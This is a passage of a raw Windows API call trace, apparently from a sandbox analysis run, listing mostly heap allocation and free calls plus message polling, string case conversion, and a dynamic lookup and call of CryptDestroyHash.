hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.999] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.999] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.999] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0259.000] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0259.000] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0259.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0259.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0259.001] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0259.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0259.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0259.002] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0259.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0259.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0259.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0259.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0259.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0259.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0259.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.005] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0259.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0259.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0259.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0259.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0259.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0259.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 